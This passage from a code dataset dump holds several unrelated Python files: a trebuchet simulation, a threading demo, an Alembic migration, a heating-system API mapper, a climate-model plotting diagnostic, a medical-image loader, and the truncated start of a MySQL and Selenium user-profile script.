k=3,s=0.0)\n sim.launchDegrees = launchDegrees_spline(sim.tmax)\n print (\" distance=%g feet at %g sec\" % (meter2foot(sim.maxrange), sim.tmax))\n else:\n sim.range=np.zeros(len(sim.t))\n sim.maxrange=0\n\n sim.Fmax = max(sim.hanger.Fvec())\n print(\" max force on hanger = %g pounds\" % (newton2lb(sim.Fmax)))\n return(sim)\n\ndef circle_intersection(ctr1, rad1, ctr2, rad2):\n \"\"\"Return intersection of two circles.\n\n Intersection returned is the one in the ccw direction from the vector\n ctr1->ctr2.\n\n \"\"\"\n\n base_len = length_(ctr2-ctr1)\n # alpha is angle from vector ctr1->ctr2 to vector ctr1->isect\n alpha = 
acos( (base_len**2 + rad1**2 - rad2**2) / (2 * base_len * rad1) )\n # beta is angle from positive x axis to vector ctr1->ctr2\n beta = rot2radians(ctr2-ctr1)\n isect = ctr1 + rad1*radians2rot(alpha+beta)\n return isect\n\ndef continue_sim(sim, time, y):\n \"continue simulation?\"\n\n #if time>0.001:\n # sim.trigger.enabled = False\n\n if sim.slide.enabled:\n shelf_force = sim.slide.forces[0][1]\n if shelf_force < 0.0:\n sim.slide.enabled = False\n\n if 0:\n if sim.sling.enabled:\n v = sim.pumpkinFrame.v\n angle = atan2(v.A[1], v.A[0])\n if v.A[0] > 0.0 and v.A[1] > 0.0 and angle <= sim.release_angle:\n sim.maxrange = Y2range(sim,y)[0]\n sim.sling.enabled = False\n #return False\n return True\n else:\n if sim.release_time:\n if time >= sim.release_time:\n sim.sling.enabled = False\n return True\n if sim.armFrame.theta >= -3*pi/4:\n return True\n if sim.pumpkinFrame.v.A1[1] > 0:\n return True\n return False\n\ndef Y2range(sim, Y, with_air_friction=True):\n if (len(Y.shape)==1):\n Y = Y.reshape([1,len(Y)])\n idx = sim.pumpkinFrame.idx\n x0 = Y[:,6*idx]\n y0 = Y[:,6*idx+1]\n vx0 = Y[:,6*idx+3]\n vy0 = Y[:,6*idx+4]\n \n if not with_air_friction:\n tof = 2.0 * vy0 / scipy.constants.g\n tof[tof<0.0] = 0.0\n return (tof*vx0)\n else: \n range = np.zeros(len(x0))\n flight = Flight(mass=sim.pumpkinFrame.pumpkin.mass,\n area=pi*sim.pumpkinFrame.pumpkin.radius**2)\n for i in np.arange(len(x0)):\n if (vy0[i] > 0) & (vx0[i] > 0):\n flight.run([x0[i],y0[i]], [vx0[i],vy0[i]])\n range[i] = flight.range()\n return range\n\ndef Y2launchDegrees(Y):\n if (len(Y.shape)==1):\n Y = Y.reshape([1,len(Y)])\n vx = Y[:,33]\n vy = Y[:,34]\n return (180./pi*np.arctan2(vy, vx))\n\n\ndef trebPEvec(sim):\n return (sim.weightFrame.PEvec() +\n sim.upperLinkFrame.PEvec() +\n sim.lowerLinkFrame.PEvec() +\n sim.connectorFrame.PEvec() +\n sim.armFrame.PEvec())\n\ndef trebKEvec(sim):\n return (sim.weightFrame.KEvec() +\n sim.upperLinkFrame.KEvec() +\n sim.lowerLinkFrame.KEvec() +\n sim.connectorFrame.KEvec() +\n sim.armFrame.KEvec())\n\ndef plotEnergies(sim):\n plot (sim.t, trebPEvec(sim) - min(trebPEvec(sim)))\n plot (sim.t, trebKEvec(sim))\n plot (sim.t, (trebPEvec(sim) - min(trebPEvec(sim)) +\n trebKEvec(sim)))\n plot (sim.t, trebKEvec(sim))\n plot (sim.t, sim.pumpkinFrame.KEvec() + sim.pumpkinFrame.PEvec())\n \n\ndef opt(X):\n global sim, X0\n X0 = X \n print (\"X=\", X)\n try:\n sim = treb(debug=False, time_step=0.0001, sim_duration=0.7,\n sling_length=X[0], link_sum=X[1], hanger_x=X[2], slide_y=-9)\n #return -sim.maxrange\n return -sim.maxrange / sim.Fmax**0.10\n\n except KeyboardInterrupt:\n raise KeyboardInterrupt\n except:\n return 0.0\n\n#X0 = array([ 8.70381, 6.08564, 10.3123 ])\n#X0 = array([ 8, 6, 10 ])\n#X0 = [ 9.62859, 6.23794, 9.98966]\n#X0 = [ 8.70153, 6.04452, 10.43426]\n#X0 = array([ 8.68625, 6.00475, 10.44 ])\n#X0 = array([ 8.21222, 5.58682, 11.43518, -9.0])\n#X0 = array([8.411, 5.587, 11.433])\nX0 = np.array([8.54665, 5.587, 11.38508])\n#lower = array([ 6.0, 3.0, 5.0])\n#upper = array([ 12.0, 9.0, 12.0])\n#result=scipy.optimize.fmin(opt, X0)\n#result=scipy.optimize.fmin_l_bfgs_b(opt, X0, approx_grad=True, bounds=None)\n#result=scipy.optimize.anneal(opt, X0, lower=lower, upper=upper, T0=0.001, feps=1e-60, full_output=True)\n\nif __name__ == '__main__':\n sim=treb(debug=True)\n anim=Animation(sim, 
Y2range)","sub_path":"treb_sim/src/first_in_fright_2012.py","file_name":"first_in_fright_2012.py","file_ext":"py","file_size_in_byte":25532,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"396860766","text":"from tasks import worker_task\nfrom threading import Thread, Lock\nimport time\n\nn_workers = 5 # number of workers\n\n\nclass MyThread(Thread):\n \"\"\" Define a new thread by subclassing the threading.Thread class\"\"\"\n\n def __init__(self, id, lock, outfile):\n Thread.__init__(self)\n self.id = id\n self.lock = lock\n self.outfile = outfile\n\n def run(self):\n worker_task(self.id, lock, outfile)\n\n\nif __name__ == '__main__':\n print(\"Spawn thread workers...\")\n workers = []\n lock = Lock() # To sharing resource between threads\n outfile = 'multithreaded_output.txt'\n\n start_time = time.time()\n for i in range(0, n_workers):\n worker_thread = MyThread(i, lock, outfile)\n worker_thread.start()\n workers.append(worker_thread)\n\n for t in workers:\n t.join()\n\n print(\"All thread workers finish...\")\n end_time = time.time()\n\n with open(outfile, 'a') as f:\n f.write(\"Program: {0} seconds\\n\".format(end_time - start_time))\n","sub_path":"multithreaded_workers.py","file_name":"multithreaded_workers.py","file_ext":"py","file_size_in_byte":1008,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"529830594","text":"\"\"\"empty message\n\nRevision ID: 64ebdc56387f\nRevises: 76f9b748967b\nCreate Date: 2018-06-08 15:39:11.532212\n\n\"\"\"\nfrom alembic import op\nimport sqlalchemy as sa\n\n\n# revision identifiers, used by Alembic.\nrevision = '64ebdc56387f'\ndown_revision = '76f9b748967b'\nbranch_labels = None\ndepends_on = None\n\n\ndef upgrade():\n # ### commands auto generated by Alembic - please adjust! ###\n op.add_column('training_task', sa.Column('parent_training_id', sa.Integer(), nullable=True))\n op.create_foreign_key(None, 'training_task', 'training_task', ['parent_training_id'], ['id'])\n # ### end Alembic commands ###\n\n\ndef downgrade():\n # ### commands auto generated by Alembic - please adjust! ###\n op.drop_constraint(None, 'training_task', type_='foreignkey')\n op.drop_column('training_task', 'parent_training_id')\n # ### end Alembic commands ###\n","sub_path":"migrations/versions/20180608153911_64ebdc56387f_.py","file_name":"20180608153911_64ebdc56387f_.py","file_ext":"py","file_size_in_byte":854,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"282397514","text":"\"\"\"Mappers from json to model classes.\"\"\"\nfrom datetime import datetime\nfrom typing import Optional, List, Any, Tuple\n\nfrom . 
import (BoilerStatus, Circulation, Device, HolidayMode, HotWater,\n QuickMode, QuickModes, QuickVeto, Room, TimeProgram,\n TimeProgramDay, TimePeriodSetting, OperatingModes, Error,\n SyncState, SettingModes, SystemInfo, Dhw, OperatingMode, Zone,\n ZoneHeating, ZoneCooling, Report, Ventilation, ActiveFunction)\n\n_DATE_FORMAT = \"%Y-%m-%d\"\n\n\ndef map_quick_mode(full_system) -> Optional[QuickMode]:\n \"\"\"Map *quick mode*.\"\"\"\n if full_system:\n quick_mode = full_system.get(\"body\", dict()) \\\n .get(\"configuration\", dict()).get(\"quickmode\")\n if quick_mode:\n mode = QuickModes.get(quick_mode.get(\"quickmode\"))\n if mode != QuickModes.QUICK_VETO:\n return mode\n return None\n\n\ndef map_outdoor_temp(full_system) -> Optional[float]:\n \"\"\"get *outdoor_temperature*.\"\"\"\n if full_system:\n raw_temp = full_system.get(\"body\", dict()).get(\"status\", dict()) \\\n .get('outside_temperature')\n if raw_temp is not None:\n return float(raw_temp)\n return None\n\n\ndef map_rooms(raw_rooms) -> List[Room]:\n \"\"\"Map *rooms*.\"\"\"\n rooms: List[Room] = []\n if raw_rooms:\n for raw_room in raw_rooms.get(\"body\", dict()).get(\"rooms\", list()):\n room = map_room(raw_room)\n if room:\n rooms.append(room)\n\n return rooms\n\n\ndef map_room(raw_room) -> Optional[Room]:\n \"\"\"Map *room*.\"\"\"\n if raw_room:\n raw_room = raw_room.get(\"body\", raw_room)\n\n if raw_room:\n config = raw_room.get(\"configuration\", dict())\n\n func = _map_function(raw_room)\n\n room_id = raw_room.get(\"roomIndex\")\n child_lock = config.get(\"childLock\")\n current_temp = config.get(\"currentTemperature\")\n devices = map_devices(config.get(\"devices\"))\n window_open = config.get(\"isWindowOpen\")\n name = config.get(\"name\")\n humidity = config.get('currentHumidity')\n\n raw_quick_veto = config.get(\"quickVeto\")\n quick_veto = None\n if raw_quick_veto:\n quick_veto = QuickVeto(\n raw_quick_veto.get(\"remainingDuration\"),\n config.get(\"temperatureSetpoint\"))\n\n return Room(id=room_id,\n name=name,\n time_program=func[0],\n temperature=current_temp,\n target_high=func[2],\n operating_mode=func[1],\n quick_veto=quick_veto,\n child_lock=child_lock,\n window_open=window_open,\n devices=devices,\n humidity=humidity)\n return None\n\n\ndef map_devices(raw_devices) -> List[Device]:\n \"\"\"Map *devices* of a room.\"\"\"\n devices = []\n if raw_devices:\n for raw_device in raw_devices:\n name = raw_device.get(\"name\")\n device_type = raw_device.get(\"deviceType\")\n battery_low = raw_device.get(\"isBatteryLow\")\n radio_out_of_reach = raw_device.get(\"isRadioOutOfReach\")\n sgtin = raw_device.get(\"sgtin\")\n devices.append(\n Device(name, sgtin, device_type, battery_low,\n radio_out_of_reach))\n\n return devices\n\n\ndef map_time_program(raw_time_program, key: Optional[str] = None) \\\n -> TimeProgram:\n \"\"\"Map *time program*.\"\"\"\n result = {}\n if raw_time_program:\n result[\"monday\"] = map_time_program_day(\n raw_time_program.get(\"monday\"), key)\n result[\"tuesday\"] = map_time_program_day(\n raw_time_program.get(\"tuesday\"), key)\n result[\"wednesday\"] = map_time_program_day(\n raw_time_program.get(\"wednesday\"), key)\n result[\"thursday\"] = map_time_program_day(\n raw_time_program.get(\"thursday\"), key)\n result[\"friday\"] = map_time_program_day(\n raw_time_program.get(\"friday\"), key)\n result[\"saturday\"] = map_time_program_day(\n raw_time_program.get(\"saturday\"), key)\n result[\"sunday\"] = map_time_program_day(\n raw_time_program.get(\"sunday\"), key)\n\n return 
TimeProgram(result)\n\n\ndef map_time_program_day(raw_time_program_day, key: Optional[str] = None) \\\n -> TimeProgramDay:\n \"\"\"Map *time program day* and *time program day settings*.\"\"\"\n settings = []\n if raw_time_program_day:\n for time_setting in raw_time_program_day:\n start_time = time_setting.get(\"startTime\")\n target_temp = time_setting.get(\"temperatureSetpoint\")\n\n mode = None\n if key:\n mode = SettingModes.get(time_setting.get(key))\n\n settings.append(\n TimePeriodSetting(start_time, target_temp, mode))\n\n return TimeProgramDay(settings)\n\n\ndef map_holiday_mode(full_system) -> HolidayMode:\n \"\"\"Map *holiday mode*.\"\"\"\n mode = HolidayMode(False)\n if full_system:\n raw_holiday_mode = full_system.get(\"body\", dict()) \\\n .get(\"configuration\", dict()).get(\"holidaymode\")\n\n if raw_holiday_mode:\n mode.is_active = bool(raw_holiday_mode.get(\"active\"))\n mode.target = float(raw_holiday_mode\n .get(\"temperature_setpoint\"))\n mode.start_date = datetime.strptime(\n raw_holiday_mode.get(\"start_date\"), _DATE_FORMAT).date()\n mode.end_date = datetime.strptime(\n raw_holiday_mode.get(\"end_date\"), _DATE_FORMAT).date()\n\n return mode\n\n\ndef map_boiler_status(hvac_state) -> Optional[BoilerStatus]:\n \"\"\"Map *boiler status.\"\"\"\n if hvac_state:\n hvac_state_info = _find_hvac_message_status(hvac_state)\n if hvac_state_info:\n last_update = _datetime_mandatory(hvac_state_info.get(\"timestamp\"))\n device_name = str(hvac_state_info.get(\"deviceName\"))\n code = str(hvac_state_info.get(\"statusCode\"))\n title = str(hvac_state_info.get(\"title\"))\n description = str(hvac_state_info.get(\"description\"))\n hint = str(hvac_state_info.get(\"hint\"))\n return BoilerStatus(device_name, title, code, description,\n last_update, hint)\n\n return None\n\n\ndef _map_status(hvac_state) -> Tuple[str, str]:\n \"\"\"Map *system status*.\"\"\"\n meta = hvac_state.get('meta', dict())\n online = meta.get('onlineStatus', dict()).get('status')\n update = meta.get('firmwareUpdateStatus', dict()).get('status')\n return online, update\n\n\ndef map_system_info(facilities, gateway, hvac, serial) -> SystemInfo:\n \"\"\"Map *system info*.\"\"\"\n if serial is None:\n serial = map_serial_number(facilities)\n\n facilities_list = facilities.get(\n \"body\", dict()).get(\"facilitiesList\", list())\n facility = [facility for facility in\n facilities_list if facility.get('serialNumber') == serial][0]\n\n name = facility.get(\"name\", None)\n mac_ethernet = facility.get(\"networkInformation\", dict()) \\\n .get(\"macAddressEthernet\")\n mac_wifi = facility.get(\"networkInformation\", dict()) \\\n .get(\"macAddressWifiAccessPoint\")\n firmware = facility.get(\"firmwareVersion\", None)\n gateway = gateway.get(\"body\", dict()).get(\"gatewayType\", None)\n\n online, update = _map_status(hvac)\n\n return SystemInfo(gateway, serial, name, mac_ethernet, mac_wifi, firmware,\n online, update)\n\n\ndef map_zones(full_system) -> List[Zone]:\n \"\"\"Map *zones*.\"\"\"\n zones = []\n if full_system:\n for raw_zone in full_system.get(\"body\", dict()).get(\"zones\", list()):\n zone = map_zone(raw_zone)\n if zone:\n zones.append(zone)\n\n return zones\n\n\ndef map_zone(raw_zone) -> Optional[Zone]:\n \"\"\"Map *zones*.\"\"\"\n raw_zone_body = raw_zone.get(\"body\")\n\n if raw_zone_body:\n raw_zone = raw_zone_body\n\n if raw_zone:\n zone_id = raw_zone.get(\"_id\")\n configuration = raw_zone.get(\"configuration\", dict())\n name = configuration.get(\"name\", \"\").strip()\n temperature = 
configuration.get(\"inside_temperature\")\n active_function = ActiveFunction[\n configuration.get(\"active_function\", ActiveFunction.STANDBY.name)]\n quick_veto = _map_quick_veto_zone(configuration.get(\"quick_veto\"))\n rbr = raw_zone.get(\"currently_controlled_by\", dict())\\\n .get(\"name\", \"\") == \"RBR\"\n\n raw_heating = raw_zone.get(\"heating\", dict())\n raw_cooling = raw_zone.get(\"cooling\", dict())\n enabled = configuration.get(\"enabled\", bool())\n\n zone_cooling = None\n func = _map_function(raw_heating, \"setting\")\n zone_heating = ZoneHeating(func[0], func[1], func[2], func[3])\n\n if raw_cooling:\n func = _map_function(raw_cooling, \"setting\")\n zone_cooling = ZoneCooling(func[0], func[1], func[2], func[3])\n\n return Zone(id=zone_id, name=name, # type: ignore\n temperature=temperature,\n quick_veto=quick_veto, active_function=active_function,\n rbr=rbr, heating=zone_heating, cooling=zone_cooling,\n enabled=enabled)\n return None\n\n\ndef map_ventilation(system) -> Optional[Ventilation]:\n \"\"\"Maps *ventilation*.\"\"\"\n ventilation = None\n if system:\n fans = system.get('body', dict()).get('ventilation', list())\n if fans:\n func = _map_function(fans[0].get('fan', dict()), 'setting')\n fan_id = fans[0].get(\"_id\")\n ventilation = Ventilation(id=fan_id, name='Ventilation',\n time_program=func[0],\n operating_mode=func[1],\n target_high=func[2], target_low=func[3])\n\n return ventilation\n\n\ndef _map_function(\n raw,\n tp_key=None) -> Tuple[TimeProgram, OperatingMode, float, float]:\n conf = raw.get(\"configuration\", dict())\n mode = conf.get('mode')\n if not mode:\n mode = conf.get('operation_mode')\n if not mode:\n mode = conf.get('operationMode')\n\n operating_mode = OperatingModes.get(mode)\n target_high = conf.get(\"setpoint_temperature\", None)\n if not target_high:\n target_high = conf.get(\"temperature_setpoint\", None)\n if not target_high:\n target_high = conf.get(\"temperatureSetpoint\", None)\n if not target_high:\n target_high = conf.get(\"day_level\", None)\n\n target_low = conf.get(\"setback_temperature\", None)\n if not target_low:\n target_low = conf.get(\"night_level\", None)\n time_program = map_time_program(raw.get(\"timeprogram\"), tp_key)\n\n return time_program, operating_mode, target_high, target_low\n\n\ndef map_hot_water(full_system, live_report) -> Optional[HotWater]:\n \"\"\"Map *hot water*.\"\"\"\n hot_water_list = None\n if full_system:\n hot_water_list = full_system.get(\"body\", dict()).get(\"dhw\")\n\n if hot_water_list:\n raw_hot_water = hot_water_list[0].get(\"hotwater\")\n dwh_id = hot_water_list[0].get(\"_id\")\n\n if raw_hot_water:\n return _map_hot_water(raw_hot_water, dwh_id, live_report)\n\n return None\n\n\ndef map_hot_water_alone(raw_hot_water, dhw_id: str, live_report) \\\n -> Optional[HotWater]:\n \"\"\"Map *hot water*.\"\"\"\n if raw_hot_water:\n raw_hot_water_body = raw_hot_water.get(\"body\", dict())\n return _map_hot_water(raw_hot_water_body, dhw_id, live_report)\n return None\n\n\ndef map_dhw(full_system, live_report) -> Dhw:\n \"\"\"Map *dhw*.\"\"\"\n circulation = map_circulation(full_system)\n hotwater = map_hot_water(full_system, live_report)\n return Dhw(hotwater=hotwater, circulation=circulation)\n\n\ndef map_circulation(full_system) -> Optional[Circulation]:\n \"\"\"Map *circulation*.\"\"\"\n if full_system:\n hot_water_list = full_system.get(\"body\", dict()).get(\"dhw\", list())\n\n if hot_water_list:\n raw_circulation = hot_water_list[0].get(\"circulation\")\n dhw_id = hot_water_list[0].get(\"_id\")\n\n 
if raw_circulation:\n return _map_circulation(raw_circulation, dhw_id)\n return None\n\n\ndef map_circulation_alone(raw_circulation, dhw_id: str) \\\n -> Optional[Circulation]:\n \"\"\"Map *circulation*.\"\"\"\n if raw_circulation:\n raw_circulation_body = raw_circulation.get(\"body\", dict())\n return _map_circulation(raw_circulation_body, dhw_id)\n return None\n\n\ndef map_errors(hvac_state) -> List[Error]:\n \"\"\"Map *errors*.\"\"\"\n errors = []\n for error in hvac_state.get(\"body\", dict()).get(\"errorMessages\",\n list()):\n if error.get(\"type\") == \"ERROR\":\n errors.append(Error(error.get('deviceName'),\n error.get('title'),\n error.get('statusCode'),\n error.get('description'),\n _datetime_mandatory(error.get('timestamp'))))\n return errors\n\n\ndef map_hvac_sync_state(hvac_state) -> Optional[SyncState]:\n \"\"\"Map sync state.\"\"\"\n if hvac_state:\n states = hvac_state.get('meta', dict()).get('syncState', list())\n if states:\n return _map_state(states[0])\n return None\n\n\ndef map_serial_number(facilities) -> str:\n \"\"\"Map serial number.\"\"\"\n facility = facilities.get(\"body\", dict()).get(\"facilitiesList\", list())[0]\n return str(facility.get(\"serialNumber\", None))\n\n\ndef _map_state(raw_state) -> Optional[SyncState]:\n state = str(raw_state.get('state'))\n timestamp = _datetime_mandatory(raw_state.get('timestamp'))\n link = raw_state.get('link', dict()).get('resourceLink')\n return SyncState(state, timestamp, link)\n\n\ndef map_reports(live_report) -> List[Report]:\n \"\"\"Maps *Reports*.\"\"\"\n reports = []\n\n if live_report:\n for device in live_report.get(\"body\", dict()).get(\"devices\", list()):\n device_id = device.get(\"_id\")\n device_name = device.get(\"name\")\n\n for report in device.get(\"reports\", list()):\n report_id = report.get(\"_id\")\n name = report.get(\"name\")\n value = report.get(\"value\")\n unit = report.get(\"unit\")\n report = Report(id=report_id, value=value, name=name,\n unit=unit, device_id=device_id,\n device_name=device_name)\n reports.append(report)\n\n return reports\n\n\ndef _map_hot_water(raw_hot_water, dhw_id: str, report) -> Optional[HotWater]:\n func = _map_function(raw_hot_water, \"mode\")\n\n current_temp = None\n\n if report:\n dhw_report = _find_dhw_temperature_report(report)\n if dhw_report:\n current_temp = dhw_report.get(\"value\")\n\n return HotWater(id=dhw_id,\n name='hotwater',\n time_program=func[0],\n temperature=current_temp,\n target_high=func[2],\n operating_mode=func[1])\n\n\ndef _map_circulation(raw_circulation, dhw_id: str) -> Circulation:\n func = _map_function(raw_circulation, \"setting\")\n\n return Circulation(id=dhw_id,\n name='Circulation',\n time_program=func[0],\n operating_mode=func[1])\n\n\ndef _find_hvac_message_status(hvac_state) -> Optional[Any]:\n for message in hvac_state.get(\"body\", dict()).get(\"errorMessages\", list()):\n if message.get(\"type\") == \"STATUS\":\n return message\n return None\n\n\ndef _find_dhw_temperature_report(live_report) -> Optional[Any]:\n for device in live_report.get(\"body\", dict()).get(\"devices\", list()):\n for report in device.get(\"reports\", list()):\n if report.get(\"associated_device_function\") == \"DHW\" \\\n and report.get(\"_id\") == \\\n \"DomesticHotWaterTankTemperature\":\n return report\n return None\n\n\ndef _map_quick_veto_zone(raw_quick_veto) -> Optional[QuickVeto]:\n if raw_quick_veto and raw_quick_veto.get(\"active\"):\n # No way to find start_date, Quick veto on zone lasts 6 hours\n return 
QuickVeto(target=raw_quick_veto.get(\"setpoint_temperature\"))\n return None\n\n\ndef _datetime(timestamp: Optional[int]) -> Optional[datetime]:\n if timestamp:\n return datetime.fromtimestamp(timestamp / 1000)\n return None\n\n\ndef _datetime_mandatory(timestamp: int) -> datetime:\n return datetime.fromtimestamp(timestamp / 1000)\n","sub_path":"pymultimatic/model/mapper.py","file_name":"mapper.py","file_ext":"py","file_size_in_byte":16744,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"646544308","text":"import nibabel as nib\nimport os\nimport numpy as np\n\n\ndef normalize_0_1(array):\n \"\"\"\" Normalize all values in the array between 0 and 1 \"\"\"\n return (array - array.min()) / (array.max() - array.min())\n\n\ndef load_volume(data_path, mask=True):\n imgs = nib.load(data_path)\n imgs_array = imgs.get_fdata()\n\n if not mask:\n imgs_array = normalize_0_1(imgs_array)\n return imgs_array\n\n\nif __name__ == '__main__':\n\n for file in os.listdir('rp_im'):\n volume_path = os.path.join('rp_im', file)\n lung_mask_path = os.path.join('rp_lung_msk', file)\n msk_path = os.path.join('rp_msk', file)\n\n volumes = load_volume(volume_path)\n lung_mask = load_volume(lung_mask_path, mask=True)\n mask = load_volume(msk_path, mask=True)\n\n print(volumes.shape)\n print(lung_mask.shape)\n print(mask.shape)\n print()\n","sub_path":"CT/3D segmentation/data/explore_data.py","file_name":"explore_data.py","file_ext":"py","file_size_in_byte":876,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"55126297","text":"# Calculate anomalies, and then plot our model groups in a boxplot\n\nfrom esmvaltool.diag_scripts.shared import (\n run_diagnostic,\n group_metadata,\n select_metadata,\n extract_variables,\n)\n\nimport iris\nimport iris.quickplot as qplt\nimport cartopy\nimport cartopy.crs as ccrs\n\nimport os\nimport logging\n\nimport matplotlib.pyplot as plt\n\nlogger = logging.getLogger(os.path.basename(__file__))\n\n\ndef process_projections_dict(proj_dict, season):\n # recursive function to pull out data from dictionary\n out_data = {}\n for k, v in proj_dict.items():\n if isinstance(v, dict):\n vals = process_projections_dict(v, season)\n for k1, v1 in vals.items():\n out_data[f\"{k} {k1}\"] = v1\n else:\n if v is None:\n continue\n # extract required season\n season_con = iris.Constraint(season_number=season)\n data = v.extract(season_con)\n # if the result is a scalar cube, just store the value\n # else store the whole cube\n if data.ndim == 1:\n out_data[k] = data.data.item()\n else:\n out_data[k] = data\n return out_data\n\n\ndef get_anomalies(ds_list, base_clim_start, fut_clim_start, relative=False):\n # construct baseline\n base_metadata = select_metadata(ds_list, start_year=base_clim_start)\n if base_metadata == []:\n logging.warning(f\"Base climatology (start {base_clim_start}) not found\")\n return None\n base_file = base_metadata[0][\"filename\"]\n base_cube = iris.load_cube(base_file)\n\n # get future\n fut_metadata = select_metadata(ds_list, start_year=fut_clim_start)\n if fut_metadata == []:\n logging.warning(f\"Future climatology (start {fut_clim_start}) not found\")\n return None\n fut_file = fut_metadata[0][\"filename\"]\n fut_cube = iris.load_cube(fut_file)\n\n if relative:\n diff = fut_cube - base_cube\n anomaly = (diff / base_cube) * 100\n anomaly.units = \"%\"\n else:\n anomaly = fut_cube - base_cube\n\n return anomaly\n\n\ndef main(cfg):\n # The config object is a dict of 
all the metadata from the pre-processor\n\n # get variable processed\n var = list(extract_variables(cfg).keys())\n assert len(var) == 1\n var = var[0]\n\n if var == \"pr\":\n rel_change = True\n else:\n rel_change = False\n\n # establish the time periods of our datasets\n start_years = list(group_metadata(cfg[\"input_data\"].values(), \"start_year\"))\n base_start = min(start_years)\n fut_start = max(start_years)\n\n # first group datasets by project..\n # this creates a dict of datasets keyed by project (CMIP5, CMIP6 etc.)\n projects = group_metadata(cfg[\"input_data\"].values(), \"project\")\n # how to uniquely define a dataset varies by project, for CMIP it's simple, just dataset...\n # for CORDEX, combo of dataset and driver (and possibly also domain if we start adding those)\n # also gets more complex if we start adding in different ensembles..\n\n # This section of the code loads and organises the data to be ready for plotting\n logger.info(\"Loading data\")\n # empty dict to store results\n projections = {}\n model_lists = {}\n cordex_drivers = []\n # loop over projects\n for proj in projects:\n # we now have a list of all the data entries..\n # for CMIPs we can just group metadata again by dataset then work with that..\n models = group_metadata(projects[proj], \"dataset\")\n\n # empty dict for results\n projections[proj] = {}\n # loop over the models\n for m in models:\n if proj[:6].upper() == \"CORDEX\":\n # then we need to go one deeper in the dictionary to deal with driving models\n drivers = group_metadata(models[m], \"driver\")\n projections[proj][m] = dict.fromkeys(drivers.keys())\n for d in drivers:\n logging.info(f\"Calculating anomalies for {proj} {m} {d}\")\n anoms = get_anomalies(drivers[d], base_start, fut_start, rel_change)\n if anoms is None:\n continue\n projections[proj][m][d] = anoms\n if proj not in model_lists:\n model_lists[proj] = []\n model_lists[proj].append(f\"{m} {d}\")\n cordex_drivers.append(d)\n elif proj == \"UKCP18\":\n # go deeper to deal with ensembles and datasets\n # split UKCP into seperate GCM and RCM\n proj_key = f\"UKCP18 {m}\"\n ensembles = group_metadata(models[m], \"ensemble\")\n projections[proj_key] = dict.fromkeys(ensembles.keys())\n for ens in ensembles:\n logging.info(f\"Calculating anomalies for {proj_key} {ens}\")\n anoms = get_anomalies(\n ensembles[ens], base_start, fut_start, rel_change\n )\n if anoms is None:\n continue\n projections[proj_key][ens] = anoms\n if proj_key not in model_lists:\n model_lists[proj_key] = []\n model_lists[proj_key].append(f\"{proj_key} {ens}\")\n else:\n logging.info(f\"Calculating anomalies for {proj} {m}\")\n anoms = get_anomalies(models[m], base_start, fut_start, rel_change)\n if anoms is None:\n continue\n projections[proj][m] = anoms\n if proj not in model_lists:\n model_lists[proj] = []\n model_lists[proj].append(f\"{m}\")\n # remove any empty categories (i.e. 
UKCP18 which has been split into rcm and gcm)\n if projections[proj] == {}:\n del projections[proj]\n cordex_drivers = set(cordex_drivers)\n\n # this section of the code does the plotting..\n # we now have all the projections in the projections dictionary\n\n # now lets plot them\n # first we need to process the dictionary, and move the data into a list of vectors\n # the projections object is the key one that contains all our data..\n seasons = {0: \"DJF\", 1: \"MAM\", 2: \"JJA\", 3: \"OND\"}\n logger.info(\"Plotting\")\n extent = (\n cfg[\"domain\"][\"start_longitude\"] - 2,\n cfg[\"domain\"][\"end_longitude\"] + 2,\n cfg[\"domain\"][\"start_latitude\"] - 2,\n cfg[\"domain\"][\"end_latitude\"] + 2,\n )\n for s in seasons.keys():\n # make directory\n try:\n os.mkdir(f\"{cfg['plot_dir']}/{seasons[s]}\")\n except FileExistsError:\n pass\n for p in projections:\n pdata = process_projections_dict(projections[p], s)\n\n for m in pdata:\n title = f\"{p} {m} {seasons[s]} {var} change\"\n plt.figure(figsize=(12.8, 9.6))\n ax = plt.axes(projection=ccrs.PlateCarree())\n ax.set_extent(extent)\n # set scales\n if var == \"pr\":\n vmn = -50\n vmx = 50\n cmap = \"brewer_RdYlBu_11\"\n else:\n vmn = 0\n vmx = 5\n cmap = \"brewer_YlOrRd_09\"\n qplt.pcolormesh(pdata[m], vmin=vmn, vmax=vmx, cmap=cmap)\n plt.title(title)\n ax.coastlines()\n ax.add_feature(cartopy.feature.BORDERS, linestyle=\":\")\n plt.savefig(\n f\"{cfg['plot_dir']}/{seasons[s]}/{p}_{m}_map_{seasons[s]}.png\"\n )\n plt.close()\n\n # print all datasets used\n print(\"Input models for plots:\")\n for p in model_lists.keys():\n print(f\"{p}: {len(model_lists[p])} models\")\n print(model_lists[p])\n print(\"\")\n\n\nif __name__ == \"__main__\":\n with run_diagnostic() as cfg:\n main(cfg)\n","sub_path":"esmvaltool/diagnostics/spatial_plot.py","file_name":"spatial_plot.py","file_ext":"py","file_size_in_byte":7948,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"377940259","text":"import mysql.connector\nimport requests\nfrom bs4 import BeautifulSoup\nfrom selenium import webdriver\nfrom selenium.webdriver.common.keys import Keys\nimport email_pass\nfrom selenium.webdriver.common.by import By\nimport time\nimport json\n\n\nmydb = mysql.connector.connect(\n host=\"localhost\",\n user=\"root\",\n password=email_pass.mysql,\n database=\"python_assignment\",\n auth_plugin=\"mysql_native_password\"\n)\n\nclass Person:\n def __init__(self, name, city=\"Roorkee\", work=None):\n self.name=name\n self.city=city\n if work is not None:\n self.work=work\n\n def show(self):\n print('My name is {} and my current city is {}'.format(self.name, self.city))\n\n def upload(self, username):\n mycursor = mydb.cursor()\n\n mycursor.execute(\"UPDATE user SET name=%s,work=%s,city=%s WHERE username=%s\", (str(self.name), json.dumps(self.work), str(self.city), username))\n\n mydb.commit()\n return \"uploaded\"\n \n\ndef check(myresult):\n for x in myresult:\n if(x[1] is not None):\n if(x[2] is not None):\n if(x[3] is not None):\n return Person(name=x[1], city= x[2], work=json.loads(x[3]))\n else:\n return Person(name=x[1], city= x[2])\n else:\n if(x[3] is not None):\n return Person(name=x[1], work=json.loads(x[3]))\n else:\n return Person(name=x[1])\n\n else:\n return 